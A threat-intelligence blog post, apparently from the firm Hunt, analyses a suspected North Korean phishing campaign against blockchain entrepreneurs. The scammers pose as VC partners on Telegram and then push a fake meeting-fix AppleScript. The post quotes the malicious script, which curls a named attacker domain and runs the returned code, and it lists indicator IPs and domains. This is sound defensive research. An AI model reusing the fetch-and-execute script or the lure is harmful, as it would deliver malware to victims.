Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram

Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram

Published on

Published on

Published on

Feb 28, 2024

Feb 28, 2024

Feb 28, 2024

Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram
Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram
Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram
TABLE OF CONTENTS

Hunt is tracking an ongoing sophisticated phishing campaign targeting individuals in the Telegram groups focused on the blockchain and angel investing communities, specifically entrepreneurs. The tactics described below are strikingly similar to those previously attributed to the Lazarus Group, a North Korean state-sponsored threat actor. Communication begins with the actor posing as a representative of an investment company seeking business opportunities. As the conversation progresses, the victim is asked to download an Apple Script after 'technical difficulties' are encountered in setting up a meeting.

In this blog post, we'll break down the specifics of this campaign, analyze infrastructure (that's what everyone's here for, right?), and uncover potential links to other yet reported malicious activities. By understanding the attacker's methods, we can collectively defend against and avoid these schemes.

Note: On 22 January 2024, Signum Capital, the targeted venture capital (VC) firm discussed below, tweeted/posted that an individual was impersonating one of their employees on Telegram.

httpshuntioimagesblogsnorth-koreanimg-1-2xwebp
Figure 1: Post by Signum Capital identifying the scam

In December of last year, the SlowMist team released a great post detailing a similar scam tied to the Lazarus group.

Initial Contact

As reported in the warning by Signum Capital, the attacker(s) created a false Telegram profile posing as a "GP" or general partner of the firm looking to discuss a potential project to collaborate on with the victim.

httpshuntioimagesblogsnorth-koreanimg-2-2xwebp
Figure 2: Fake Telegram Account

Typical to any social engineering attack, the actor engages in casual conversation to build and gain the victim's trust by pretending to be a possible investor in the victim entrepreneur's organization. Next, the attacker requests the individual's Calendly link so they can schedule a call. For those unaware, Calendly is an online appointment and calendar software similar to Google Calendar.

httpshuntioimagesblogsnorth-koreanimg-3-2xwebp
Figure 3: Request for Calendly link

On the day of the call, the attacker sends the victim a seemingly legitimate meeting link. However, upon attempting to open the link, the user is met with a 'restricted' message preventing them from joining the call. In the campaign described here, all links were deleted after they were downloaded.

The attacker feigned confusion to maintain legitimacy and claimed to contact their IT administrator for assistance. The "solution" presented was for the victim to download an Apple Script that would "fix" the access issue. The script, however, is malicious and designed to allow the hackers to compromise the victim's device.

httpshuntioimagesblogsnorth-koreanimg-4-2xwebp
Figure 4: 'Restricted' error message scam

In this case, the user was asked to download a file named IP_Request.scpt. The specific instructions are below:

"# Troubleshoot the issue set fix_url to "https://support.internal-meeting.site/359215/send-ip-request" set sc to do shell script "curl -L -k \"" & fix_url & "\"" run script sc."

A quick rundown of the above commands will be described to understand the attack better:

  • The first line initializes the URL to the variable 'fix_url.'
  • The second line invokes the system shell and uses the curl command to make an HTTP request to the fix_url mentioned above variable.
  • Finally, the third line executes the script obtained from the result of the second line.

For those following along, we will start our investigation with the suspicious domain name, 'support[.]internal-meeting[.]site.'

Infrastructure Analysis

The above domain resolves to the IP address 104.168.163[.]149. Let's look at what additional information we can retrieve in Hunt.

httpshuntioimagesblogsnorth-koreanimg-5-2xwebp
Figure 5: Hunt domain history for initial domain
httpshuntioimagesblogsnorth-koreanimg-6-2xwebp
Figure 6: Hunt SSL History

Looking at Figure 5, we can see a few additional meeting-related domains that could be used or were used in related campaigns. This domain uses the Hostwinds ASN and has ports 443 and 3389 open. From here, we will use Hunt's SSL History to identify additional domains connected to the certificate's common name, 'email.alwayswait[.]online.'

httpshuntioimagesblogsnorth-koreanimg-7-2xwebp
Figure 7: TLS Certificate pivot for additional domains

Two additional IP addresses using the exact ASN and port number for the TLS certificate. Let's quickly peek at what domains are hosted on these servers.

Note: A complete list of domains will be provided at the end of this post.

httpshuntioimagesblogsnorth-koreanimg-8-2xwebp
Figure 8: Snippet of domain history for 104.168.137[.]21
httpshuntioimagesblogsnorth-koreanimg-9-2xwebp
Figure 9: Domain history for 104.168.163[.]124

Another possible indicator I noticed when looking into this small infrastructure cluster is that the certificate common names for RDP on port 3389 follow a pattern, 'hwc-hwp-[7 numeric characters].'

Among the many domains in Figure 8, including one seeming to spoof French video game company Ubisoft, you may have noticed 'support[.]cryptowave[.]capital.' The attackers appear to have registered a front VC firm that is still accessible for viewing on the web.

httpshuntioimagesblogsnorth-koreanimg-10-2xwebp
Figure 10: Fake VC firm webpage (Courtesy: urlscan.io)

Before we get too ahead of ourselves, let's check out the malicious domain sent as part of the supposed 'fix' to the technical issues cited in Figure 4.

httpshuntioimagesblogsnorth-koreanimg-11-2xwebp
Figure 11: Familiar 404 page (Courtesy: urlscan.io)

If you are at all interested in tracking North Korean threat actors, you would know that there are always a few indicators that give their activity away:

  • Hostwinds ASN dedicated servers
  • Let's Encrypt SSL certificates
  • Namecheap (among others) for domain registrars
  • HTTP response hash *403 & 404

You're likely curious, as I am, if any additional infrastructure uses a similar 404 page. Our friends at urlscan.io make this way too easy. Navigating to the indicators tab of the initial domain, we simply click on the hash and profit.

httpshuntioimagesblogsnorth-koreanimg-12-2xwebp
Figure 12: Web page response hash (Courtesy: urlscan.io)
httpshuntioimagesblogsnorth-koreanimg-13-2xwebp
Figure 13: Page hash results (Courtesy: urlscan.io)

Reviewing the matching domains above, we see a standard naming convention confirming that the results are likely related to the attack.

Our investigation started with several interesting related domains and a Let's Encrypt certificate we mentioned in Figure 7. Wondering if there are any associated subdomains? So am I, let's check!

httpshuntioimagesblogsnorth-koreanimg-14-2xwebp
Figure 14: Passive DNS results for the TLD certificate common name (Courtesy: VirusTotal).

We have another new IP address (23[.]254[.]129[.]6) to check out. Once again, we'll return to Hunt and see this server's interesting ports/domains.

httpshuntioimagesblogsnorth-koreanimg-15-2xwebp
Figure 15: Hunt domain history for 23[.]254[.]129[.]6

Hunt identified only an OpenSSH port on standard port 22 open for this IP address, which is also located on Hostwinds ASN. Public reporting has identified the recurring use of *.linkpc[.]net and *.work[.]gd domains, as we see in Figure 15 by the group tracked as Bluenoroff (Kaspersky), APT38 (RecordedFuture/Mandiant), and Black Alicanto (PWC).

This information should quell any doubts we may have had that this attack was likely carried out by the APT, commonly referred to as Lazarus Group.

Honorable Mention

Below, we'll briefly highlight similar to the infrastructure matching the actors' infrastructure setup that may require additional examination.

aulis[.]ventures → 142.11.212[.]104 → Hostwinds ASN

httpshuntioimagesblogsnorth-koreanimg-16-2xwebp
Figure 16: Hunt certificate data
httpshuntioimagesblogsnorth-koreanimg-17-2xwebp
Figure 17: Screenshot of aulis[.]ventures (Courtesy of urlscan.io)

Conclusion

This ongoing phishing campaign targeting blockchain and investment enthusiasts highlights the importance of exercising caution when dealing with unsolicited investment opportunities, especially online. While the Lazarus Group's involvement remains unconfirmed, their known tactics suggest a connection.

Remember, legitimate companies usually won't pressure you into sharing sensitive information or downloading unknown scripts. To stay protected, ensure your Telegram account is protected by multi-factor authentication and you think twice before opening or running unfamiliar URLs or scripts.

If you haven't already, please apply for an account with Hunt today to see how your company can identify and link phishing attempts before your users are targeted.

Network Indicators

IP AddressDomain
104[.]168[.]163[.]149support.internal-meeting[.]site\
big-typl[.]online\
ns1.big-typl[.]online\
suntcijm.mouradvps43hostwin[.]online\
mail.big-typl[.]online\
eosszzc.hateoo[.]space\
www.big-typl[.]online
104[.]168[.]137[.]21meet.cryptowave[.]capital\
dun.wndlwndmfe[.]xyz\
support.trustmeeting[.]live\
ubisoft.trustmeeting[.]live\
trustmeeting[.]live\
support.cryptowave[.]capital\
technical-support.safe-meeting[.]online\
support.video-meet[.]xyz\
support.safe-meeting[.]online\
email.alwayswait[.]online\
shared.dropbox-docsend[.]online\
www.team-meet[.]xyz\
udaviemayas[.]com\
ubi-safemeeting[.]live\
ubisoft.safe-meeting[.]online\
dun.auditprovidre[.]online\
archax.trustmeeting[.]live\
support.ubi-safemeeting[.]live\
secure.paycount.webbs-information.login[.]udaviemayas[.]com
104[.]168[.]163[.]124www.group-meeting[.]xyz
23[.]254[.]129[.]6you.alwayswait[.]online
TABLE OF CONTENTS

Hunt is tracking an ongoing sophisticated phishing campaign targeting individuals in the Telegram groups focused on the blockchain and angel investing communities, specifically entrepreneurs. The tactics described below are strikingly similar to those previously attributed to the Lazarus Group, a North Korean state-sponsored threat actor. Communication begins with the actor posing as a representative of an investment company seeking business opportunities. As the conversation progresses, the victim is asked to download an Apple Script after 'technical difficulties' are encountered in setting up a meeting.

In this blog post, we'll break down the specifics of this campaign, analyze infrastructure (that's what everyone's here for, right?), and uncover potential links to other yet reported malicious activities. By understanding the attacker's methods, we can collectively defend against and avoid these schemes.

Note: On 22 January 2024, Signum Capital, the targeted venture capital (VC) firm discussed below, tweeted/posted that an individual was impersonating one of their employees on Telegram.

httpshuntioimagesblogsnorth-koreanimg-1-2xwebp
Figure 1: Post by Signum Capital identifying the scam

In December of last year, the SlowMist team released a great post detailing a similar scam tied to the Lazarus group.

Initial Contact

As reported in the warning by Signum Capital, the attacker(s) created a false Telegram profile posing as a "GP" or general partner of the firm looking to discuss a potential project to collaborate on with the victim.

httpshuntioimagesblogsnorth-koreanimg-2-2xwebp
Figure 2: Fake Telegram Account

Typical to any social engineering attack, the actor engages in casual conversation to build and gain the victim's trust by pretending to be a possible investor in the victim entrepreneur's organization. Next, the attacker requests the individual's Calendly link so they can schedule a call. For those unaware, Calendly is an online appointment and calendar software similar to Google Calendar.

httpshuntioimagesblogsnorth-koreanimg-3-2xwebp
Figure 3: Request for Calendly link

On the day of the call, the attacker sends the victim a seemingly legitimate meeting link. However, upon attempting to open the link, the user is met with a 'restricted' message preventing them from joining the call. In the campaign described here, all links were deleted after they were downloaded.

The attacker feigned confusion to maintain legitimacy and claimed to contact their IT administrator for assistance. The "solution" presented was for the victim to download an Apple Script that would "fix" the access issue. The script, however, is malicious and designed to allow the hackers to compromise the victim's device.

httpshuntioimagesblogsnorth-koreanimg-4-2xwebp
Figure 4: 'Restricted' error message scam

In this case, the user was asked to download a file named IP_Request.scpt. The specific instructions are below:

"# Troubleshoot the issue set fix_url to "https://support.internal-meeting.site/359215/send-ip-request" set sc to do shell script "curl -L -k \"" & fix_url & "\"" run script sc."

A quick rundown of the above commands will be described to understand the attack better:

  • The first line initializes the URL to the variable 'fix_url.'
  • The second line invokes the system shell and uses the curl command to make an HTTP request to the fix_url mentioned above variable.
  • Finally, the third line executes the script obtained from the result of the second line.

For those following along, we will start our investigation with the suspicious domain name, 'support[.]internal-meeting[.]site.'

Infrastructure Analysis

The above domain resolves to the IP address 104.168.163[.]149. Let's look at what additional information we can retrieve in Hunt.

httpshuntioimagesblogsnorth-koreanimg-5-2xwebp
Figure 5: Hunt domain history for initial domain
httpshuntioimagesblogsnorth-koreanimg-6-2xwebp
Figure 6: Hunt SSL History

Looking at Figure 5, we can see a few additional meeting-related domains that could be used or were used in related campaigns. This domain uses the Hostwinds ASN and has ports 443 and 3389 open. From here, we will use Hunt's SSL History to identify additional domains connected to the certificate's common name, 'email.alwayswait[.]online.'

httpshuntioimagesblogsnorth-koreanimg-7-2xwebp
Figure 7: TLS Certificate pivot for additional domains

Two additional IP addresses using the exact ASN and port number for the TLS certificate. Let's quickly peek at what domains are hosted on these servers.

Note: A complete list of domains will be provided at the end of this post.

httpshuntioimagesblogsnorth-koreanimg-8-2xwebp
Figure 8: Snippet of domain history for 104.168.137[.]21
httpshuntioimagesblogsnorth-koreanimg-9-2xwebp
Figure 9: Domain history for 104.168.163[.]124

Another possible indicator I noticed when looking into this small infrastructure cluster is that the certificate common names for RDP on port 3389 follow a pattern, 'hwc-hwp-[7 numeric characters].'

Among the many domains in Figure 8, including one seeming to spoof French video game company Ubisoft, you may have noticed 'support[.]cryptowave[.]capital.' The attackers appear to have registered a front VC firm that is still accessible for viewing on the web.

httpshuntioimagesblogsnorth-koreanimg-10-2xwebp
Figure 10: Fake VC firm webpage (Courtesy: urlscan.io)

Before we get too ahead of ourselves, let's check out the malicious domain sent as part of the supposed 'fix' to the technical issues cited in Figure 4.

httpshuntioimagesblogsnorth-koreanimg-11-2xwebp
Figure 11: Familiar 404 page (Courtesy: urlscan.io)

If you are at all interested in tracking North Korean threat actors, you would know that there are always a few indicators that give their activity away:

  • Hostwinds ASN dedicated servers
  • Let's Encrypt SSL certificates
  • Namecheap (among others) for domain registrars
  • HTTP response hash *403 & 404

You're likely curious, as I am, if any additional infrastructure uses a similar 404 page. Our friends at urlscan.io make this way too easy. Navigating to the indicators tab of the initial domain, we simply click on the hash and profit.

httpshuntioimagesblogsnorth-koreanimg-12-2xwebp
Figure 12: Web page response hash (Courtesy: urlscan.io)
httpshuntioimagesblogsnorth-koreanimg-13-2xwebp
Figure 13: Page hash results (Courtesy: urlscan.io)

Reviewing the matching domains above, we see a standard naming convention confirming that the results are likely related to the attack.

Our investigation started with several interesting related domains and a Let's Encrypt certificate we mentioned in Figure 7. Wondering if there are any associated subdomains? So am I, let's check!

httpshuntioimagesblogsnorth-koreanimg-14-2xwebp
Figure 14: Passive DNS results for the TLD certificate common name (Courtesy: VirusTotal).

We have another new IP address (23[.]254[.]129[.]6) to check out. Once again, we'll return to Hunt and see this server's interesting ports/domains.

httpshuntioimagesblogsnorth-koreanimg-15-2xwebp
Figure 15: Hunt domain history for 23[.]254[.]129[.]6

Hunt identified only an OpenSSH port on standard port 22 open for this IP address, which is also located on Hostwinds ASN. Public reporting has identified the recurring use of *.linkpc[.]net and *.work[.]gd domains, as we see in Figure 15 by the group tracked as Bluenoroff (Kaspersky), APT38 (RecordedFuture/Mandiant), and Black Alicanto (PWC).

This information should quell any doubts we may have had that this attack was likely carried out by the APT, commonly referred to as Lazarus Group.

Honorable Mention

Below, we'll briefly highlight similar to the infrastructure matching the actors' infrastructure setup that may require additional examination.

aulis[.]ventures → 142.11.212[.]104 → Hostwinds ASN

httpshuntioimagesblogsnorth-koreanimg-16-2xwebp
Figure 16: Hunt certificate data
httpshuntioimagesblogsnorth-koreanimg-17-2xwebp
Figure 17: Screenshot of aulis[.]ventures (Courtesy of urlscan.io)

Conclusion

This ongoing phishing campaign targeting blockchain and investment enthusiasts highlights the importance of exercising caution when dealing with unsolicited investment opportunities, especially online. While the Lazarus Group's involvement remains unconfirmed, their known tactics suggest a connection.

Remember, legitimate companies usually won't pressure you into sharing sensitive information or downloading unknown scripts. To stay protected, ensure your Telegram account is protected by multi-factor authentication and you think twice before opening or running unfamiliar URLs or scripts.

If you haven't already, please apply for an account with Hunt today to see how your company can identify and link phishing attempts before your users are targeted.

Network Indicators

IP AddressDomain
104[.]168[.]163[.]149support.internal-meeting[.]site\
big-typl[.]online\
ns1.big-typl[.]online\
suntcijm.mouradvps43hostwin[.]online\
mail.big-typl[.]online\
eosszzc.hateoo[.]space\
www.big-typl[.]online
104[.]168[.]137[.]21meet.cryptowave[.]capital\
dun.wndlwndmfe[.]xyz\
support.trustmeeting[.]live\
ubisoft.trustmeeting[.]live\
trustmeeting[.]live\
support.cryptowave[.]capital\
technical-support.safe-meeting[.]online\
support.video-meet[.]xyz\
support.safe-meeting[.]online\
email.alwayswait[.]online\
shared.dropbox-docsend[.]online\
www.team-meet[.]xyz\
udaviemayas[.]com\
ubi-safemeeting[.]live\
ubisoft.safe-meeting[.]online\
dun.auditprovidre[.]online\
archax.trustmeeting[.]live\
support.ubi-safemeeting[.]live\
secure.paycount.webbs-information.login[.]udaviemayas[.]com
104[.]168[.]163[.]124www.group-meeting[.]xyz
23[.]254[.]129[.]6you.alwayswait[.]online

Related Posts:

XenoRAT Adopts Excel XLL Files and ConfuserEx as Access Method
Nov 19, 2024

Discover XenoRAT’s adoption of Excel XLL files and Confuser’s tactical shift from its usual methods, with our insights on adapting to evolving malware techniques.

XenoRAT Adopts Excel XLL Files and ConfuserEx as Access Method
Nov 19, 2024

Discover XenoRAT’s adoption of Excel XLL files and Confuser’s tactical shift from its usual methods, with our insights on adapting to evolving malware techniques.

Targeting Innovation: Sliver C2 and Ligolo-ng Used in Operation Aimed at Y Combinator
Nov 12, 2024

Sliver C2 and Ligolo-ng join forces in a campaign likely targeting Y Combinator, revealing tactics and infrastructure aimed at the accelerator's network. Learn more.

Targeting Innovation: Sliver C2 and Ligolo-ng Used in Operation Aimed at Y Combinator
Nov 12, 2024

Sliver C2 and Ligolo-ng join forces in a campaign likely targeting Y Combinator, revealing tactics and infrastructure aimed at the accelerator's network. Learn more.

RunningRAT’s Next Move: From Remote Access to Crypto mining For Profit
Nov 5, 2024

RunningRAT has shifted from access-driven tactics to crypto mining, using open directories to stage payloads and reduce direct C2 traffic.

RunningRAT’s Next Move: From Remote Access to Crypto mining For Profit
Nov 5, 2024

RunningRAT has shifted from access-driven tactics to crypto mining, using open directories to stage payloads and reduce direct C2 traffic.

Oct 31, 2024

Discover an open directory of red team tools fit for Halloween, from Cobalt Strike to BrowserGhost.

Oct 31, 2024

Discover an open directory of red team tools fit for Halloween, from Cobalt Strike to BrowserGhost.

XenoRAT Adopts Excel XLL Files and ConfuserEx as Access Method
Nov 19, 2024

Discover XenoRAT’s adoption of Excel XLL files and Confuser’s tactical shift from its usual methods, with our insights on adapting to evolving malware techniques.

Targeting Innovation: Sliver C2 and Ligolo-ng Used in Operation Aimed at Y Combinator
Nov 12, 2024

Sliver C2 and Ligolo-ng join forces in a campaign likely targeting Y Combinator, revealing tactics and infrastructure aimed at the accelerator's network. Learn more.